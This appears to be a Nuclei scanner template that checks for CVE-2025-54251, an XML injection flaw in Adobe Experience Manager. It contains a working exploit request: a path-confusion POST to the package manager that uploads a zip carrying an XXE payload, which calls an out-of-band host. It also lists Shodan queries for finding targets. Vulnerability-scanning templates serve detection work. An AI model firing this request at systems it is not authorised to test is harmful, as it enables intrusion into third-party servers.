漏洞描述
Adobe Experience Manager versions 6.5.23.0 and earlier are affected by an XML Injection vulnerability that could result in a Security feature bypass.
id: CVE-2025-54251
info:
name: Adobe Experience Manager ≤ 6.5.23.0 - XML Injection
author: DhiyaneshDK,assetnote
severity: medium
description: |
Adobe Experience Manager versions 6.5.23.0 and earlier are affected by an XML Injection vulnerability that could result in a Security feature bypass.
reference:
- https://github.com/assetnote/hopgoblin/blob/main/hopgoblin.py
- https://nvd.nist.gov/vuln/detail/CVE-2025-54251
- https://helpx.adobe.com/security/products/experience-manager/apsb25-90.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
cvss-score: 4.3
cve-id: CVE-2025-54251
epss-score: 0.18003
epss-percentile: 0.94918
cwe-id: CWE-91
cpe: cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:*
metadata:
verified: true
max-request: 1
vendor: adobe
product: experience_manager
shodan-query:
- http.title:"aem sign in"
- http.component:"adobe experience manager"
- cpe:"cpe:2.3:a:adobe:experience_manager"
tags: cve,2025,adobe,aem,xxe,oast,oob,intrusive,vuln,vkev
variables:
marker: "{{randstr}}"
filename: "{{to_lower(rand_text_alpha(5))}}"
boundary: "{{hex_encode(rand_text_alphanumeric(32))}}"
xxe_payload: '<!DOCTYPE x [<!ENTITY foo SYSTEM "http://{{interactsh-url}}/{{marker}}">]><x>&foo;</x>'
http:
- raw:
- |
POST /crx/packmgr/service/exec.json;x='x/graphql/execute/json/x'?cmd=upload&jsonInTextarea=true HTTP/1.1
Host: {{Hostname}}
User-Agent: hopgoblin/1.0
Content-Type: multipart/form-data; boundary={{boundary}}
--{{boundary}}
Content-Disposition: form-data; name="package"; filename="{{filename}}.zip"
Content-Type: application/zip
{{zip('META-INF/vault/privileges.xml',xxe_payload)}}
--{{boundary}}--
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains_any(body,'success')"
- "contains(interactsh_protocol, 'http')"
condition: and
# digest: 490a0046304402207d5b2a6c2d641a3a5859d34a09a54b87ecc221d38daef2539e80e956ad8143ff022070a462f98998e20922a0df63338dde0ad70d73c338f8652e53c8f10e9515a2f4:922c64590222798bb761d5b6d8e72950